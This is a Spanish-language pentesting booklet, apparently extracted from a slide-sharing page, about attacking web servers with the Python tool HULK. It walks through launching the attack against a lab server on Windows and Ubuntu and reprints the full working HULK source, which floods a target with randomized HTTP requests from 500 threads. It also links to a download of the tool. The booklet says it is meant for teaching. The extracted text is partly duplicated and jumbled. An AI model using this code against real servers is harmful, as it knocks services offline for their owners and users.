Hackin9 - Ataques de tipo HTML injectiondegarden
 

Similar a Manual de pentesting_sobre_ataque_web_python_hulk (20)

Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
 
Hacking withinnails pdfcompleto
Hacking withinnails pdfcompletoHacking withinnails pdfcompleto
Hacking withinnails pdfcompleto
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE) Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
 
VIRUS INFORMATICOS
VIRUS INFORMATICOSVIRUS INFORMATICOS
VIRUS INFORMATICOS
 
Parcialofimatica
ParcialofimaticaParcialofimatica
Parcialofimatica
 
VIRUS INFORMATICOS
VIRUS INFORMATICOSVIRUS INFORMATICOS
VIRUS INFORMATICOS
 
PRESENTACION DOS
PRESENTACION DOSPRESENTACION DOS
PRESENTACION DOS
 
Hackers
HackersHackers
Hackers
 
Ingenieria social.hack04ndalus
Ingenieria social.hack04ndalusIngenieria social.hack04ndalus
Ingenieria social.hack04ndalus
 
proyecto cracker
proyecto crackerproyecto cracker
proyecto cracker
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
 
Eres más hackeable de lo que piensas
Eres más hackeable de lo que piensasEres más hackeable de lo que piensas
Eres más hackeable de lo que piensas
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que crees
 
Hackers y crackers
Hackers y crackersHackers y crackers
Hackers y crackers
 
Virus
VirusVirus
Virus
 
Hackin9 - Ataques de tipo HTML injection
Hackin9 - Ataques de tipo HTML injectionHackin9 - Ataques de tipo HTML injection
Hackin9 - Ataques de tipo HTML injection
 
Hackeo sivernetico
Hackeo siverneticoHackeo sivernetico
Hackeo sivernetico
 

Manual de pentesting_sobre_ataque_web_python_hulk

  • 1. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 1
  • 2. Libro de Et Contacto: whitehat.mexico@gmail.com Edición Descubre como es el LSCA, Carlos Alberto Castruita Rodríguez Edición impresa en PDF protegida contra impresión y sobre escritura. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com Edición patrocinada por WhiteHat México el Arte del Hacking de una visión de un White Hat. Por Carlos Alberto Castruita Rodríguez Edición Independiente © 2015 impresa en PDF protegida contra impresión y sobre escritura. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 2 Arte del Hacking de una visión de un White Hat. Carlos Alberto Castruita Rodríguez impresa en PDF protegida contra impresión y sobre escritura.
  • 3. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 3 Descubre desde cero como es Arte del Hacking de una visión de un White Hat. El libro de PENTESTING y de SEGURIDAD INFORMATICA está diseñado para hacer pruebas de vulnerabilidad de seguridad informática, robo de información y espionaje de datos, narrado a un nivel técnico para gentes con conocimiento de nivel básico a medio del área de informática o soporte técnico en sistemas. Autor: Carlos Alberto Castruita Rodríguez Director de WhiteHat - México Con 20 años de experiencia en el área sistemas. Certificado Hellermann Tyton Certificado 3com Networks Ethical Hacker Certificado Contacto: carlos.castruita@whitehatmexico.tk
  • 4. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 4 ATAQUE A SERVIDORES WEB “ HULK ” Ataque de denegación de servicio con Python Hulk Se trata de un cliente HTTP capaz de provocar una denegación de servicio (DoS) a servidores web con poco uso de ancho de banda. Dicho cliente HTTP intenta abrir tantas conexiones como pueda al servidor web e intenta mantenerlas abiertas tanto tiempo como sea posible. Periódicamente para evitar que el servidor web cierre la conexión va añadiendo headers a la petición HTTP sin llegar a finalizarla nunca. Vamos a realizar un ataque controlado ya que si atacamos un servidor establecido incurriremos en un delito. Levante un servidor con IIS y monte el WampServer para poner una simple página web hecha en WordPress.
  • 5. Libro de Et Contacto: whitehat.mexico@gmail.com Nuestro servidor web tiene la siguiente IP 192.168.0.100 Lo verificamos con el comando ipconfig El ataque lo haremos con una versión viejita de Python la versión 2.7 Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión. Acezamos al folder de Python desde modo Dos. Python 2.7 lo puedes descargar de GRATIS al final de la explicación. Hulk descárgalo igual al final de este mismo. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com Nuestro servidor web tiene la siguiente IP 192.168.0.100 Lo verificamos con el comando ipconfig os con una versión viejita de Python la versión 2.7.5 Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión. al folder de Python desde modo Dos. escargar de GRATIS al final de la explicación. descárgalo igual al final de este mismo. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 5 Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión.
  • 6. Libro de Et Contacto: whitehat.mexico@gmail.com SINTAXIS: python.exe >> ESCRIBIR: python.exe Y ahora si prepárense, por que el servidor WEB se va a colapsar. Haremos el mismo ejerció en Linux. En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja Ubuntu y después seleccionamos la opción EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com python.exe hulk.py <Url> python.exe hulk.py http://192.168.0.100 { INTRO } Y ahora si prepárense, por que el servidor WEB se va a colapsar. en Linux. En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja Ubuntu y después seleccionamos la opción Herramienta para Desarrolladores. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 6 { INTRO } En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja Herramienta para Desarrolladores.
  • 7. Libro de Et Contacto: whitehat.mexico@gmail.com Ahora escogemos Python y lo instalamos. Ya instalado el Python abrimos una El archivo Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el archivo. Usaremos la misma sintaxis que usamos dentro de Windows. SINTAXIS: python.exe >> ESCRIBIR: python.exe EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com escogemos Python y lo instalamos. Ya instalado el Python abrimos una terminal, recuerda que se abre con CTRL+ALT+ Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el la misma sintaxis que usamos dentro de Windows. python.exe hulk.py <Url> python.exe hulk.py http://192.168.0.100 { INTRO } EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 7 terminal, recuerda que se abre con CTRL+ALT+T. Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el { INTRO }
  • 8. Libro de Et Contacto: whitehat.mexico@gmail.com Ahora nos aparecerá el letrero El ataque se ha iniciado y dejaremos que se envíen las peticiones al server. NOTA IMPORTANTE: Estos ejercicios de ataques son entidad gubernamental, son ataques 100% controlados. Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos. Yo como escritor e investigador de técnicas de ataque a medios uno de mis ejercicios de ataques a redes, servidores, equipos son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros. Expongo los ejercicios que yo como técnico dejo visto como un Black Hacker puede atacar un equipo electrónico. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. @gmail.com Ahora nos aparecerá el letrero – HULK Attack Started – El ataque se ha iniciado y dejaremos que se envíen las peticiones al server. Estos ejercicios de ataques son con fines didácticos y no atacamos a ninguna empresa ni entidad gubernamental, son ataques 100% controlados. Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos. Yo como escritor e investigador de técnicas de ataque a medios informáticos uno de mis ejercicios de ataques a redes, servidores, equipos informáticos son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros. Expongo los ejercicios que yo como técnico informático a mi persona me han funcionado y dejo visto como un Black Hacker puede atacar un equipo electrónico. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 8 El ataque se ha iniciado y dejaremos que se envíen las peticiones al server. con fines didácticos y no atacamos a ninguna empresa ni Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos. informáticos, que cada informáticos y telefónicos son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros. a mi persona me han funcionado y
  • 9. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 9 Anexo copia del código fuente de Hulk desarrollado por Barry Shteiman # ---------------------------------------------------------------------------------------------- # HULK - HTTP Unbearable Load King # # this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them # to their knees by exhausting the resource pool, its is meant for research purposes only # and any malicious usage of this tool is prohibited. # # author : Barry Shteiman , version 1.0 # ---------------------------------------------------------------------------------------------- import urllib2 import sys import threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter
  • 10. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 10 request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') return(headers_useragents)
  • 11. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 11 # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://' + host + '/') return(headers_referers) #builds random ascii string def buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print '---------------------------------------------------' print 'USAGE: python hulk.py <url>' print 'you can add "safe" after url, to autoshut after dos' print '---------------------------------------------------' #http request def httpcall(url): useragent_list() referer_list()
  • 12. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 12 code=0 if url.count("?")>0: param_joiner="&" else: param_joiner="?" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print 'Response Code 500' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code)
  • 13. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 13 #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==500) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+100<request_counter) & (previous<>request_counter): print "%d Requests Sent" % (request_counter) previous=request_counter if flag==2: print "n-- HULK Attack Finished --" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]=="help": usage()
  • 14. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 14 sys.exit() else: print "-- HULK Attack Started --" if len(sys.argv)== 3: if sys.argv[2]=="safe": set_safe() url = sys.argv[1] if url.count("/")==2: url = url + "/" m = re.search('http://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t = HTTPThread() t.start() t = MonitorThread() t.start() Es muy fácil entender la lógica de funcionamiento del código y uno puede hasta hacerle mejoras al mismo código pero como indica el mismo autor del mismo que es un delito el uso malicioso para ataque DOS.
  • 15. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 15 BONUS Descargas de Software libre de Compra de Licencia. WhiteHat México tiene esas aplicaciones en la nube, listas para descargar. WINDOWS: • Python 2.7.5 URL: QR: • Hulk URL: https://mega.co.nz/#!OIpCDTgA!ikGOVC833_Y0nGtVsgXJPqmjfvcpqpNj19yjdVrdS80 QR: